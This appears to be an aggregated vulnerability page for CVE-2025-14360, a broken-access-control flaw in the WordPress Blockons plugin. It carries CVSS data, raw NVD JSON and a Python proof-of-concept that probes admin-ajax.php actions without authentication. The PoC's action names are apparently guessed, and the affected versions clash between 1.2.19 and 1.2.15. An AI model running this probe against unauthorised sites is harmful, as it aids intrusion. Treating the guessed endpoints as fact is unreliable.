Security Vulnerability Report
中文
CVE-2025-14360 CVSS 7.5 HIGH

CVE-2025-14360

Published: 2026-01-08 10:15:46
Last Modified: 2026-04-27 17:16:25

Description

Missing Authorization vulnerability in Kaira Blockons blockons allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blockons: from n/a through <= 1.2.19.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Blockons Plugin <= 1.2.19 (所有版本到1.2.19均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14360 PoC - WordPress Blockons Broken Access Control # Target: WordPress site with Blockons plugin <= 1.2.19 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Test for missing authorization in Blockons plugin Check if protected AJAX endpoints are accessible without authentication """ # Common Blockons AJAX endpoints that should require authentication ajax_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/blockons/v1/*", ] # Test actions that should be protected test_actions = [ "blockons_save_settings", "blockons_export_template", "blockons_import_template", "blockons_get_config", "blockons_save_layout", ] print(f"[*] Testing CVE-2025-14360 on {TARGET_URL}") print(f"[*] Checking {len(test_actions)} potential vulnerable endpoints\n") vulnerable_endpoints = [] for action in test_actions: # Test without authentication (no cookies, no nonce) data = { "action": action, } try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=data, timeout=10, verify=False ) # Check if request succeeds without auth # A protected endpoint should return 403, 401, or error message if response.status_code == 200: # Check response content if "error" not in response.text.lower() and "denied" not in response.text.lower(): print(f"[!] VULNERABLE: {action} - Accessible without authentication") vulnerable_endpoints.append(action) else: print(f"[+] PROTECTED: {action}") else: print(f"[+] PROTECTED: {action} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[-] ERROR testing {action}: {str(e)}") if vulnerable_endpoints: print(f"\n[!] VULNERABILITY CONFIRMED!") print(f"[!] Found {len(vulnerable_endpoints)} unprotected endpoints") return True else: print(f"\n[+] No obvious vulnerabilities found (may need manual testing)") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14360", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:46.067", "lastModified": "2026-04-27T17:16:24.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Kaira Blockons blockons allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blockons: from n/a through <= 1.2.19."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Kaira Blockons blockons permite Acceder a Funcionalidad No Restringida Adecuadamente por ACLs. Este problema afecta a Blockons: desde n/a hasta &lt;= 1.2.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/blockons/vulnerability/wordpress-blockons-plugin-1-2-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}